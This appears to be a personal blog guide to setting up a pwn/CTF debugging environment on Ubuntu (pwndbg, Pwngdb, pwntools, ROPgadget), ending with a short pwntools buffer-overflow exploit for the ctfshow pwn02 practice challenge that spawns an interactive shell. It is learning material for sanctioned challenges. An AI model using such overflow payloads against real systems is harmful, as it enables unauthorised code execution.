0x01 Preface
Honestly, I think binary exploitation is something rather sacred. Even though I can't do it yet, I can't be without an environment for it.
0x02 action
16.04
Install VMware Tools; there are tutorials online, and mine inexplicably just worked.

```bash
sudo apt update
sudo apt install curl   # install the curl download tool
```

```bash
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
```

```bash
sudo apt-get install python-setuptools python-dev build-essential
sudo apt-get install python-setuptools
pip install --upgrade --no-deps --force-reinstall pathlib
pip install pathlib2
```
```bash
sudo apt-get install gdb
sudo apt-get install git

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

git clone https://github.com/scwuaptx/Pwngdb.git
git clone https://github.com/pwndbg/pwndbg

wget https://bootstrap.pypa.io/pip/3.5/get-pip.py
python3 get-pip.py   # if pip3 is still not installed afterwards, try: sudo python3 get-pip.py

cd ~/pwndbg
./setup.sh

cd ../
cp ~/Pwngdb/.gdbinit ~/
sudo apt install vim
vim ~/.gdbinit
```

The file contents are as follows:

```
#source ~/peda/peda.py
source ~/pwndbg/gdbinit.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py

define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end
```

That's it for this one.
20.04.6
This came about because, late one night, a master (iyheart) knew I wanted to set up a pwn environment but kept putting it off. At the same time the new students had arrived and many of them were learning this stuff, so starrysky wrote an article for it. What follows is basically the same as what she wrote; I'm just recording it here.
One thing to emphasise: whenever you are asked to choose y or n, always answer y.
ISO link:

```
https://releases.ubuntu.com/20.04.6/ubuntu-20.04.6-desktop-amd64.iso
```

Update first, then install vim. Switch to root first, otherwise it doesn't work well. Enter your own password when prompted.

```bash
sudo apt upgrade
sudo apt install vim
```
To avoid typing the commands one at a time, the master thoughtfully put everything into a file; you just write the file and run it. This is done in the home directory.

```bash
vim test.sh
# press Esc, then :wq to save and quit
chmod 777 test.sh    # chmod +x test.sh is enough; the file only needs to be executable by you
# check that the permissions were applied
ls -l test.sh
./test.sh
```

File contents:

```bash
#!/bin/bash
cd ~
sudo apt install tzdata
sudo apt install vim
sudo apt install libxml2-dev
sudo apt install libxslt-dev
sudo apt install libmysqlclient-dev
sudo apt install libsqlite3-dev
sudo apt install zlib1g-dev
sudo apt install python2-dev
sudo apt install python3-pip
sudo apt install libffi-dev
sudo apt install libssl-dev
sudo apt install wget
sudo apt install curl
sudo apt install gcc
sudo apt install clang
sudo apt install make
sudo apt install zip
sudo apt install build-essential
sudo apt install libncursesw5-dev libgdbm-dev libc6-dev
sudo apt install tk-dev
sudo apt install openssl
sudo apt install virtualenv
sudo apt install git
sudo apt install proxychains4
sudo apt install ruby-dev

# setuptools for Python 2
wget https://mirrors.aliyun.com/pypi/packages/56/a0/4dfcc515b1b993286a64b9ab62562f09e6ed2d09288909aee1efdb9dde16/setuptools-36.6.1.zip
unzip setuptools-36.6.1.zip
cd setuptools-36.6.1
sudo python2 setup.py install
cd ../
sudo rm -rf setuptools-36.6.1 setuptools-36.6.1.zip

# setuptools for Python 3
wget https://mirrors.aliyun.com/pypi/packages/03/c9/7b050ea4cc4144d0328f15e0b43c839e759c6c639370a3b932ecf4c6358f/setuptools-65.4.1.tar.gz
tar -zxvf setuptools-65.4.1.tar.gz
cd setuptools-65.4.1
sudo python3 setup.py install
cd ../
sudo rm -rf setuptools-65.4.1 setuptools-65.4.1.tar.gz

# pip for both interpreters
wget https://mirrors.aliyun.com/pypi/packages/53/7f/55721ad0501a9076dbc354cc8c63ffc2d6f1ef360f49ad0fbcce19d68538/pip-20.3.4.tar.gz
tar -zxvf pip-20.3.4.tar.gz
cd pip-20.3.4
sudo python2 setup.py install
sudo python3 setup.py install
cd ../
sudo rm -rf pip-20.3.4 pip-20.3.4.tar.gz

sudo pip2 config set global.index-url https://mirrors.aliyun.com/pypi/simple
sudo pip3 config set global.index-url https://mirrors.aliyun.com/pypi/simple

sudo python2 -m pip install --upgrade pip
sudo python3 -m pip install --upgrade pip

pip3 install --upgrade pip
sudo pip2 install pathlib2
```
Then pwntools and the other miscellaneous bits.

```bash
sudo python2 -m pip install --upgrade pwntools
sudo python3 -m pip install --upgrade pwntools
```
There will definitely be yellow warnings partway through; that's fine, it's only because Python 2.7 is no longer maintained. Keep going.

```bash
wget https://starrysky1004.github.io/pwnenv.zip
unzip pwnenv.zip
rm pwnenv.zip

# pwndbg
git clone https://github.91chi.fun/https://github.com/pwndbg/pwndbg.git
cd pwndbg
./setup.sh
cd ../

# Pwngdb
cd ~/
git clone https://github.com/scwuaptx/Pwngdb.git
cp ~/Pwngdb/.gdbinit ~/

vim ~/.gdbinit
# comment out the first line, then on the second line write: source ~/pwndbg/gdbinit.py, then save
```

This involves git clone operations, so it may fail, but retrying a few times works. The resulting file is:

```
#source ~/peda/peda.py
source ~/pwndbg/gdbinit.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py

define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end
```
Check it: if there is output, it's working.

```bash
sudo apt install patchelf
```

```bash
git clone https://github.com/matrix1001/glibc-all-in-one.git
cd glibc-all-in-one
python3 update_list
cat list
```

```bash
sudo pip3 install capstone filebytes unicorn keystone-engine ropper
```

```bash
sudo apt-get install qemu-system
```

```bash
sudo -H python3 -m pip install ROPgadget
```

```bash
sudo gem install one_gadget
sudo gem install seccomp-tools
```
one_gadget
The installation failed; it needs Ruby 3.1, but I don't dare touch that.
So install this instead:

```bash
sudo apt install gem
gem install elftools -v 1.2.0
```

Still doesn't work, but I don't dare touch it. Haha, never mind. Let's find a demo to test whether the environment works.
Don't forget to reboot.
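To make the "check it" step above concrete, here is an added verification script (my own, not from the original post or from starrysky's article). It assumes the default paths used above (~/pwndbg, ~/Pwngdb, ~/.gdbinit) and the tool names as installed by the commands in this post.

```bash
#!/bin/bash
# Added example: report which parts of the pwn environment are actually present.
# Assumes the default install locations used in the post above.

# Return 0 if a command is on PATH, 1 otherwise.
have_cmd() {
    command -v "$1" >/dev/null 2>&1
}

# Return 0 if a Python module imports under the given interpreter.
have_pymod() {
    "$1" -c "import $2" >/dev/null 2>&1
}

# Return 0 if the gdbinit file sources the given script.
# Commented-out lines (e.g. "#source ~/peda/peda.py") do not count.
# $2 optionally overrides the path, default ~/.gdbinit.
gdbinit_sources() {
    local gdbinit="${2:-$HOME/.gdbinit}"
    [ -f "$gdbinit" ] && grep -Eq "^[[:space:]]*source[[:space:]]+.*$1" "$gdbinit"
}

# Print one status line per component; return the number of missing ones.
check_pwn_env() {
    local missing=0 item
    for item in gdb git python3 patchelf ROPgadget ropper one_gadget seccomp-tools qemu-system-x86_64; do
        if have_cmd "$item"; then echo "[ok]      $item"
        else echo "[missing] $item"; missing=$((missing + 1)); fi
    done
    # pwntools, capstone, unicorn and keystone-engine import under these names
    for item in pwn capstone unicorn keystone; do
        if have_pymod python3 "$item"; then echo "[ok]      python3 module $item"
        else echo "[missing] python3 module $item"; missing=$((missing + 1)); fi
    done
    for item in pwndbg/gdbinit.py Pwngdb/pwngdb.py Pwngdb/angelheap/gdbinit.py; do
        if gdbinit_sources "$item"; then echo "[ok]      .gdbinit sources $item"
        else echo "[missing] .gdbinit sources $item"; missing=$((missing + 1)); fi
    done
    return "$missing"
}

# Usage: save as check_pwn_env.sh, then:  . ./check_pwn_env.sh && check_pwn_env
```

A non-zero exit status from check_pwn_env tells you how many pieces are still missing, so it can be re-run after each retry of the clone or install steps.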
demo
ctfshow pwn02
```python
from pwn import *

# connect to the ctfshow pwn02 challenge service
sh = remote("pwn.challenge.ctf.show", 28236)
sys_addr = 0x8048518
sh.recv()
# 13 bytes of padding followed by the target address
payload = b'a' * 13 + p32(sys_addr)
sh.sendline(payload)
sh.interactive()
```

It worked.
0x03 Summary
I've wanted this for a long time; it's just that my previous Ubuntu 16 machine had network problems and died on me, so I never got around to it. These past few days I finally had the chance. This is all just the basic environment; there should be more to add later.